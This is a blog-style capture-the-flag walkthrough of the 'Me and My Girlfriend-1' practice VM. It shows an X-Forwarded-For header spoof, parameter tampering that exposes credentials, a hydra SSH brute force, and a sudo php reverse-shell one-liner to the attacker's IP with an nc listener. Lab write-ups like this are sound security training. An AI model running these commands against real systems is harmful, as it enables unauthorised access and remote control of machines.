Hello guys,welcome…Me and My Girlfriend-1 is one of the easiest virual machine i ever done..Let’s look into it.For this ,A basic knowledge on php,Linux,and html is required.so i’m running this vm in vmware Fusion-11 in macbook pro..and my attacker machine is kali Linux.By default this Vm uses Bridged network adapter so let’s connect our kali machine to bridged network.
Done…After that let’s perform a network scan using netdiscover which is preinstalled in kali.
Here it is.so 192.168.43.234 is our Vm.Without any delay let’s scan for Open Ports.For Port scanning,i’m going to use NMAP which is preinstalled in linux or You can also install it in mac by using HomeBrew.
“nmap -A 192.168.43.234 -vv” after scanning i came to know that it’s running a apache server version 2.4.7 and a ssh service.
Without any delay Let’s get started by firing up our firefox.
hmmm… interesting After opening our Browser It seems strange…isn’t it?It stopped me for a while to think what was that talking about…..
After going through the source code.i got this..
It’s talking about header injection…so,Again without any delay let’s fireup our Brupsuite to intercept the traffic and inject some header..As we can see that,this site can be only accessed by localhost.Quickly fireup Brup and set our browser proxy to 127.0.0.1 and port 8080.I’m using brup community edition here.You can see the request header below.
All we want to do is,We have to inject some Header.we can do it by using brupsuite.Let’s to go to options in proxy.we’ll find like this Match and replace all we need to do is replace something with our new header.So,let’s goo..
i’ve replaced the Origin:foo.example.org.You can see it in above screenshot.
So,Select that item and edit and add “X-Forwarded-For:localhost” after that openup our browser and let’s refresh again and forward the request header.As you can observe the request that we’ve changed below:
This is the request header after adding your item..And the site appears like this..
As you can observe,When we hover on those links it show ?page=login and ?page=register.I’ve tried the sql injection but those are not vulnerable to sql..So, i’ve registered my name and password in register page..
After successfull Register.I’ve logged in as sam
hmm….Looks Interesting.Look at the Url.After trying some sql injection,I came to a conclusion that it is not vulnerable to sql injection but we can tamper the parameters.After changing that id=12 to id =1.I’ve got this..
But i can’t see the password here…After seeing the source code..i’ve got the password.
As we can observe the above HTML Code,the Username value is “eweuhtandingan” and the password value is “skuyatuh” so the both are username and password.But There is no login page in this site.. I tried to find the login page but failed.So,i’ve decide to create a username text file with all the usernames that are present in the site and also created a password txt file as below..
Remeber ssh service is running on this device.By using these Credentials May be we can login to VM.Too find out that quickly i’ve used hydra to get the correct username and password
“hydra -L user.txt -P pass.txt 192.168.43.234 ssh” By Using this command we can get the user name and password…After running this i’ve got something.
So,we got the username and password we can login into the device..
“ssh email@example.com” and the password “4lic3”
I’m in now,There is nothing here unless we go for hidden directories
There is a folder named .my_secret.after that going into that directory i’ve got these to files.
I’ve got my first flag and we got some notes too …
and now our job is to get root access.For getting root access we need to find the files That Alice can run as root without password.After some finding i came up with this.”Sudo -l” gave this wonderful information.
Alice can run php with root privilages without root password.so,if we want to get root privilages u need some php here..soo let’s Start a listener by the following command:
“nc -lvnp 1234” i’m port 1234.You can also different according to your choice.
after our listener is started let’s execute this command to get the reverse shell
“sudo /usr/bin/php -r ‘$sock=fsockopen(“192.168.43.182”,1234);exec(“/bin/sh -i <&3 >&3 2>&3”);’ “
After that cd /root;cat flag2.txt and that’s it…..
We’ve successfully Hacked into our Vm..
Staytuned for more Hacking stories.
Follow me on github:https://github.com/LetMeHackYou
Ok Guys see you in our next Article……………………………………………………………………………………………………………………………………………………………………………………………………………..